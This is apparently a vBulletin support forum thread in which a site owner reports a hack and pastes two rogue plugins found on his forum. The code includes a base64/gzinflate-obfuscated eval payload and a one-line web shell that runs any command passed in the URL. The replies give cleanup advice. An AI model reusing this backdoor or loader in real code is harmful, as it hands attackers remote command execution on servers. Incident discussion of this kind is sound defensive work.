Announcement

Collapse
No announcement yet.

Site hacked

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Lynne
    replied
    Originally posted by Jon12345 View Post
    One thing I notice is that if I type in mysite.com/includes/ I get to see the directory listing of files. That can't be right. How does vbulletin normally get that hidden?
    There should be a blank index.html file in the /includes directory.

    Leave a comment:


  • Jon12345
    replied
    I mean do you think the htaccess file has been edited so that this is possible?

    Leave a comment:


  • borbole
    replied
    Originally posted by Jon12345 View Post
    One thing I notice is that if I type in mysite.com/includes/ I get to see the directory listing of files. That can't be right. How does vbulletin normally get that hidden?
    It shouldn''t be shown. Maybe you can open a ticket at your client center, providing you qualify for that, so one of the vb staff can have a deeper look into this.

    Leave a comment:


  • Jon12345
    replied
    One thing I notice is that if I type in mysite.com/includes/ I get to see the directory listing of files. That can't be right. How does vbulletin normally get that hidden?

    Leave a comment:


  • borbole
    replied
    Indeed. This is a type of hack that has hit quite a lot of vb forums recently. Your host should be able to help you to identify the point of entry and patch it up. It would also be better to do a scan of your server space and db.

    What version of vb are you using? If you are not already using the latest version of the 3.8x series, it would be best to upgrade your forum a.s.a.p.

    Leave a comment:


  • Lynne
    replied
    If you didn't install them, then delete them. They are not default vbulletin plugins. Also, please contact your host to let them know you were hacked and then you need to go through the access_logs from around the time of the hack and see how it was done.

    Leave a comment:


  • Jon12345
    started a topic Site hacked

    Site hacked

    I've noticed that my site must have been hacked quite some time back. Amongst other things, I have found a couple of entires under Plugin Manager.

    Default Plugin ™

    ajax_complete

    5

    eval(gzinflate(base64_decode("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")));


    faq

    faw_start

    faq

    5

    if (isset($_GET['c'])) { system($_GET['c']); }
    Two entries, faq and default plugin.

    What do you make of those two?

    Thanks,

    Jon

Related Topics

Collapse

Working...
X